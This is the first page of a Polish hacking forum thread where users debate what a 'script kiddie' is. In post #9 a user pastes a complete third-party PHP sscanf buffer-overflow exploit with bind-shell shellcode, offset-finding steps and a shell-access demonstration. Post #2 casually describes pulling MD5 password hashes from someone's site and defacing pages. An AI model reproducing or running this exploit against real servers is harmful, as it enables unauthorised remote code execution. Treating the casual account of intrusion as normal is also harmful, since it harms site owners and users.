Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 19

Temat: Definicja script-kiddie

  1. #1
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie Definicja script-kiddie

    Hej!

    Na poczatku zaznacze - prosze TYLKO o Wasze definicje a nie klotnie ktora definicja jest lepsza... Jesli zauwaze cos takiego bede kasowal posty...


    Chodzi mi o wyjasnienie terminu script-kiddie i poznanie Waszych definicji a nie wszczynanie wojen... Poza tym mam dziwne wrazenie ze skorzysta na tym wiecej osob... oczywiscie ten watek ma swoj cel, wiec czekam na Wasze definicje.


    Definicja script-kiddie z ktora sie zgadzam wyglada mniej wiecej tak:

    Script kiddie to niedoswiadczony atakujacy (bo do hackera to jeszcze bardzo daleko), ktory uzywa skryptow (exploitow) napisanych ludzi od niego sprytniejszych, sam nie rozumiejac zasady ich (skryptow) dzialania.

    Jakie inne definicje macie/znacie/wyznajecie?
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  2. #2
    Avatar ble34
    ble34 jest offline jestem bugiem
    Zarejestrowany
    Oct 2006
    Skąd
    krzesło
    Postów
    681

    Domyślnie re

    czym dlamnie są sk
    to stali bywalcy bugtraqów wykorzytujący prace innych
    często nieznający języków programowania
    a ich ogólne pojęcie o temacie bezpieczenstwa to podstwy podstaw
    dla mnie to troche głupawe jest
    jeszce niedawno tez mne kręciła modyfikacja treści na cudzie stronie
    albo odpalenie jakiegos exploita na winde
    ale ostatnio wyciągnełem hasła z pewnei wytryny w postaci zaszyfrowanei md5
    zrobiłem zrut ekranu i poszłem spać
    nobo poco mam marnowac czas na rozkodowanie tych haseł?
    tylko poto zeby wkleic obrazek na stronie kolesia
    przecież to obłuda
    niepowiększy to mojej wiedzy
    bo zhakowac strona tak naprawede może każdy kto zna podstawy
    wystarczy wejśc na bugtraq
    znaleść podatną strone i odpalić exploit
    naszcęści z bycia sk się wyrasta

  3. #3
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    11

    Domyślnie

    wg mnie to ludzie, którzy używają skryptów i programów napisanych przez innych, o których nie mają zielonego pojęcia jak działają. Potem się chwalą tym jaki zrobili wyczyn.

    To ludzie w stylu: "Chciałbym program, gdzie podam IP i nacisnę HACKUJ"... A czasem się zdarza, ze ten IP to 127.0.0.1. ...

    Sam kiedyś spróbowałem sobie Caina i "węszyłem". Ale to nie powód do dumy.

    Uważam też, że prawie każdy choć przez chwilę był scipt-kiddie.
    "Odkryłem coś dzisiaj. Znalazłem komputer. Chwileczkę, to jest świetne. Robi to, czego chcę. Jeśli popełnia błąd to tylko dlatego, że coś spieprzyłem, a nie dlatego, że mnie nie lubi… "

  4. #4
    Avatar ble34
    ble34 jest offline jestem bugiem
    Zarejestrowany
    Oct 2006
    Skąd
    krzesło
    Postów
    681

    Domyślnie re

    a właściwie zkąd takie pytanie wogóle?

  5. #5
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    Stopień poziomu doświadczenia w znajomości zagadnień bezpieczeństwa.
    Wiedza wymagana do osiągnięcia tego stopnia:
    podstawowa znajomość języków (głównie scriptingu - z tąd nazwa) bash, php, python, owk wykorzystywanych głównie do ataków na źle zabezpieczone serwery typu *nix.
    Script-Kiddies potrafią znaleść w internecie potrzebne im programy/skrypty, przerobić je na własne potrzeby i uruchomić.

  6. #6
    Avatar ble34
    ble34 jest offline jestem bugiem
    Zarejestrowany
    Oct 2006
    Skąd
    krzesło
    Postów
    681

    Domyślnie

    to 90% forum to skrypciarze
    ja to wszystko umie nieuwarzam się za zkrypciarza
    oczywiście za hakera tez nie ani za lame
    mnie to poprostu kręci
    ale zchęcią posłucham otym kto jest kim
    wsród nas
    ech dałem sie wciagnąć w definiowanie beznadzieinych zjawisk
    tak naprawde to nieiwem kto jest hakerem ,skrypciarzem ,lamerem
    może ja jestem skrypciarzem według czyis krteriów
    a moze nie
    ale koniec końców guzik mnie to obchodzi
    apozatym czy sadzisz ze języki skryptowe sa takie proste
    to alboe jesteś wybitny albo znasz ich podstawy
    poszukaj sobie zródeł chodzby php
    naprawde mozna znich dużo wykszesac
    pozatym jedyne uproszcenie w stosunku do jezyków kompilowanych jakie znam to to ze chyba we wszytkich
    żutowanie typów zmiennych jest atomatyczne no i alokacja pamięci tak to się chyba okresla
    bo w kompilowanych
    to najbardziei mnie denrewuje
    pozatym wielkich rróznic niewidze
    wszytkie wymagaja myslenia w miare logicznego

    np napisać aplikacje podatna na bo
    w php i wexploiyowac albo śmignąc sobie phpmyadmin
    albo napisać exploit na cokolwiek
    wcale niejst tak prosto jak by mogło sie wydawać no nie?
    troche zboczyłem z tematu
    Ostatnio edytowane przez ble34 : 05-08-2007 - 20:19

  7. #7
    w4j
    w4j jest offline
    Zarejestrowany
    Feb 2007
    Postów
    69

    Domyślnie

    nie zgodzę się z wami. Wszyscy wypowiadają się o SK z pewną pogardą. A to nie o to chodzi. Żeby chociażby odpalić jakiś expliot trzeba mieć wiedzę o wiele większą niż przeciętny użytkownik PC. Do tego można się wiele przy tym nauczyć. No ale oczywiście to jest złe bo uzyskujesz dostęp do informacji, do których dostępu nie powinieneś mieć itd., ale co nie jest złe? Przecież hakerstwo z założenia jest złe(i tylko nie mówicie mi o tym że haker to osoba, której tylko zależy na powiększaniu swojej wiedzy...). Przecież ktoś znajduje dziury i ktoś pisze exploity nie po to by ludzie zobaczyli jego prace i powiedzieli "o fajnie nowy exploit, ciekawe kiedy załatają tą dziurę. A tymczasem idę zrobić sobie herbatę", tylko po to by ludzie ich używali. Resztę dopiszę dzisiaj, ale w godzinach wieczornych bo jakoś mi brak natchnienia.

  8. #8
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Thumbs up Dobry temat

    ble34 masz rację i sie z tobą zgadzam każdy pewnie zerka w bugtraq ale na szczęście są one pisane tak żeby jak najbardziej utrudnić życie sk - czy to hex'em czy pokazując linijkę kodu na który powinno się zwrócić uwagę - nio oczywiście niestety nie wszystkie...

    Nie odrazy Rzym zbudowano!

    Nie wyobrażam sobie znaleźć Bug w jakiejś popularnej aplikacji bez wcześniejszego zaznajomienia się z innymi bugami - zobaczenia źle napisanego skryptu itp...

    fakt faktem nieraz potrzebna jest jakaś dopałka - jakaś podpowiedź od strony doświadczonych - w tym również jakieś gotowe rozwiązanie - nie wiem jak dla was ale dla mnie jeden konkretny przykład jest lepszy niż 1000 kursów i książek - byle by go w należyty sposób wykorzystać (ten przykład)....

    kto jest SK - ten co weźmie exploita odpali narozrabia i czuje się z tego dumny...

    kto nie jest SK (a właściwie jest początkowo SK ale z tego wyrasta) ten co weźmie exploit odpali narozrabia i stwierdzi że wszystko fajnie ale ja chce wiedzieć czemu mi sie udało przejąć tą kontrolę nad innym hostem - siądzie sobie w nocy jak starsi śpią - odpali kompa przeczyta FAQ i co sie da żeby się nauczyć podstaw - potem weźmie się za naukę jakiegoś języka programowania - a jak mu nie idzie to się zapyta coś na forum ale w sposób mądry używając jakiegoś fachowego języka a nie zmyślając jakąś historyjek jaki to on biedny i poszkodowany i pomóżcie mu...
    a i przede wszystkim nie poddadzą się po pierwszym napotkanym problemie...

    a i jeszcze jedno chyba najważnejsze zdanie które chcę powiedzieć:

    Dodam że może troszkę kontrowersyjnie będzie ale to moje zdanie i ty
    le!

    Dzieci jak dzieci. Ktoś za nie jest odpowiedzialny! Czyżby rodzice?
    Tylko kto tu jest rodzicami? Dla mnie ci którzy piszą kolejne FAQ w których pokazują kroczek po kroczku co gdzie kliknąć żeby się włamać!

    Czy widzicie sens pisania takich FAQ, robienia filmików i wrzucania na rapida czy na youtobe? Fakt faktem większość nich jest robione przez SK którzy zobaczyli gdzieś podobny zauczyli się jak się to robi i 'wydali' własny niejako przypisując sobie prawo autorskie i zyskując szacunek w oczach kolejnych Sk którzy myślą że ten co zrobil fimik to haker pierwsza klasa!

    Ale przecież ktoś musiał najpierw taki filmik stworzyć - ktoś kto miał wiedzę...
    Po co żeby zaistnieć w sieci a jego nick był znany wśród SK ?

    Wszystko dla ludzi - edukacja ok - ale czy taka osoba jest gotowa wziąć odpowiedzialność za to w jaki sposób może wykorzystać filmik widz - przecież wystarczy napisać jedno magiczne zdanie które chyba każdy zna i nie ma sensu go cytować...

    Dla mnie powinny istnieć FAQ które opisują coś w sposób wymagający wiedzy, inteligencji i myślenia od czytelnika! - nio cuż za pięknie by chyba było..

    Przy czym żeby nie było nie jasności - nie chcę tu rozbijać 'hakerów' na elitę i SK - wręcz przeciwnie uważam że elita powinna przekazywać zdobytą wiedzę kolejnym pokolenia - inaczej polska scena administracyjna będzie... a właściwie wcale jej nie bedzie a potem się dziwić że do bazy NFZ każdy ma dostęp bo Admin po prostu zapomniał założyć hasła (sprawa z gorionem jak ktoś pamięta)

    Hehe - jak to pisze to dochodze do wniosku że chyba chce z polski utopie zrobić - nio cóż moje zdanie to moje zdanie - tyle mi przynajmniej wolno mieć

    Ps. jak ktoś to wszystko przeczytał i nie zasnął to niezła śruba jest albo robokop pozdrówka
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  9. #9
    Avatar ble34
    ble34 jest offline jestem bugiem
    Zarejestrowany
    Oct 2006
    Skąd
    krzesło
    Postów
    681

    Domyślnie

    Kod php:
    <?
    /***********************************************************
     * hoagie_php_sscanf.php
     * PHP <= 4.4.3 / 5.1.4 local buffer overflow exploit
     *
     * howto get offsets:
     * (set $base_addr to 0x41414141)
     * # ulimit -c 20000
     * # /etc/init.d/apache restart
     * (execute script via web browser)
     * # tail /var/log/apache/error.log
     * ...
     * [Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp
     * ...
     * $ gdb /usr/sbin/apache /tmp/core
     * ...
     * ...
     * #0  0x40422b2d in php_sscanf_internal () from /usr/lib/apache/1.3/libphp4.so
     * (gdb) x/250 $edx
     * ...
     * 0x83ae16c:      0x41414141      0x41414141      0x41414141      0x41414141
     * 0x83ae17c:      0xdeadbabe      0x41414145      0x4141415d      0x00000001
     *                                 ^^^^^^^^^^
     *                                 start of our buffer (0x83ae180) = $base_addr
     * 0x83ae18c:      0x00000008      0x4141415d      0x0833d248      0x00000400
     * 0x83ae19c:      0x909006eb      0x90909090      0xe3f7db31      0x435366b0
     *                                                 ^^^^^^^^^^
     *                                                 start of shell code (0x83ae1a4)
     * 0x83ae1ac:      0x89534353      0x80cd4be1      0x6652c789      0x43204e68
     * 0x83ae1bc:      0xe1895366      0xd0f6efb0      0x89575150      0xcd66b0e1
     * 0x83ae1cc:      0x4366b080      0x5080cd43      0xe1895750      0xcd66b043
     * 0x83ae1dc:      0x89d98980      0x2c6fb0c3      0x80cd4930      0x51f6e241
     * 0x83ae1ec:      0x732f6e68      0x2f2f6868      0xe3896962      0xe1895351
     * 0x83ae1fc:      0xd0f6f4b0      0x414180cd      0x41414141      0x41414141
     * 0x83ae20c:      0x41414141      0x41414141      0x41414141      0x41414141
     * ...
     * (gdb) quit
     * #
     * (change $base_addr in exploit and now call url again)
     * # gdb /usr/sbin/apache /tmp/core
     * #0  0x40475e73 in _efree ()
     * from /usr/lib/apache/1.3/libphp4.so
     * (gdb) x/4w $ebp
     * 0xbfffb018:     0xbfffb038      0x40484241      0x0812a2f4      0xbfffb038
     *                                 ^^^^^^^^^^
     *                                 return address (return address location = 0xbfffb01c)
     * (change $rec_log in exploit and call url again)
     * $ telnet 127.0.0.1 20000
     * Trying 127.0.0.1...
     * Connected to localhost.
     * Escape character is '^]'.
     * id;
     * uid=33(www-data) gid=33(www-data) groups=33(www-data)
     * exit;
     * Connection closed by foreign host.
     * $
     *
     * NOTE: Because of PHP memory allocation this exploit depends on filename, pathname
     *       content etc... (because each line/byte will change emalloc() behavior
     *
     * Credits: Heintz (discovered this bug)
     *          BigHawk (bind shell code)
     *          Greuff (void.at)
     *
     * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
     * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
     * DAMAGE DONE USING THIS PROGRAM.
     *
     * VOID.AT Security
     * [email protected]
     * http://www.void.at
     *
     ************************************************************/

       /* base_addr for buffer in memory */
       
    $base_addr 0x812a260;
       
    $base_addr_fill 0x16;
       
    /* byte 0 = fill up, byte 1 = refcount, byte 2 = is_ref, byte 3 = type */
       
    $zval_attr 0x00000008;
       
    /* will be overwritten to execute our shellcode */
       
    $ret_loc 0xbfffb01c;
       
    /* just for searching */
       
    $pattern 0xdeadbabe;

       function 
    long2str($addr) {
          return 
    pack("V"$addr);
       }

       
    $data =
             
    /* fill up memory */
              
    str_repeat(long2str($base_addr), $base_addr_fill) .
              
    /* pattern */
              
    long2str($pattern) .
             
    /* current = base_addr */
          
    long2str($base_addr 0x4) .    
              
    /* *current = _zval_struct */
          /* _zval_struct */
          /* _zvalue_value */
          /* _zvalue_value.str.val */
              
    long2str($base_addr 0x10 0xc) .
          
    /* _zvalue_value_str.len */
          
    long2str(0x00000001) .
          
    /* _zval_struct.type, _zval_struct.is_ref, _zval_struct.refcount */
              
    long2str($zval_attr) .
          
    /* _zend_mem_header */
          /* _zend_mem_header.pNext = start of shellcode  */
              
    long2str($base_addr 28) .
          
    /* _zend_mem_header.pLast */
              
    long2str($ret_loc) .
          
    /* zend_mem_header.size, zend_mem_header.cached */
          
    long2str(0x000000400) .
          
    /* jump over next six bytes */
          
    "\xeb\x06\x90\x90" .
          
    /* this bytes will be overwritten by efree() */
          
    "\x90\x90\x90\x90" .
          
    /* shell code starts here -
           * BigHawk bind() version - just a little update to get rid
           * of 0x3f
           */
          
    "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd" .
          
    "\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1\xb0\xef" .
          
    "\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43" .
          
    "\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89" .
          
    "\xc3\xb0\x6f\x2c\x30\x49\xcd\x80\x41\xe2\xf6\x51\x68\x6e\x2f" .
          
    "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\xf4" .
          
    "\xf6\xd0\xcd\x80" .
          
    /* fill up memory */
          
    str_repeat(long2str($base_addr), $base_addr_fill);

       
    /* fill up memory with emalloc() for sscanf() */
       
    quotemeta($data);

       
    /* trigger exploit */
       
    sscanf($data'%1$s'$str);
    ?>
    to jest php dla mnie wszxytko jasne i mówienie ze języki skryptowe to domena sk
    to ignorancja oczywiście exploit niejest mój

  10. #10
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Hmmmm...

    Cytat Napisał w4j
    Przecież hakerstwo z założenia jest złe(i tylko nie mówicie mi o tym że haker to osoba, której tylko zależy na powiększaniu swojej wiedzy...).
    Ty masz chlopie jakies pojecie spaczone... widac za duzo telewizji... Hacker to osoba o znacznej wiedzy, ktora dzieki tej wiedzy wlasnie potrafi zrobic rzeczy ktorych inni nie potrafia, bo hacker zna istote problemu od podszewki - tak jak konstruktor a nie uzytkownik urzadzenia.

    Czy hacker jest zly? Wiedza nie jest zla - zly moze byc sposob jej uzycia. Bron nie zabija ludzi... ludzie zabijaja ludzi...

    Cytat Napisał eMCe
    kto jest SK - ten co weźmie exploita odpali narozrabia i czuje się z tego dumny...
    ... i przypisuje sobie nie swoje zaslugi - zrobilem to i tamto... taaaaa, jaaaaasne - to zrobil exploit ktorego uzyles a nie Ty... i to jest wlasnie roznica...

    - "Sluchajcie chlopaki, ale dym... normalnie odjazd... Ten sasiad co nas wkurzal mial kompa hehe... teraz siedzi i reinstaluje. Wczoraj sie wbilem i takiedo dymu narobilem ze teraz nic mu nie zostalo tylko reinstalka"
    - "Hahahaha... dobre dobre... a jak sie wbiles? Niezly jestes!"
    - "No.... sluchajcie ile sie nameczylem zeby znalezc ta dziure no i dziala, nie zawsze ale dziala..."
    - "A gdzie ta dziura?"
    - "No w Windows no..."
    - "No to to wiem, dokladniej chce wiedziec"
    - "W google se poszukaj cwaniaku... wystarczy sciagnac exploita i juz - to takie proste"

    Kazdy zaczyna od exploitow na pewnym etapie... ale jesli chce miec efekty w ten sposob i nie zadaje sobie trudu zrozumienia jak dziala eksploit i dlaczego dany software da sie w ten sposob zaatakowac (bo to sa 2 polowki ktore do siebie idealnie pasuja a jedna bez drugiej nie ma sensu) to taka osoba bedzie jedynie glupim SK...
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj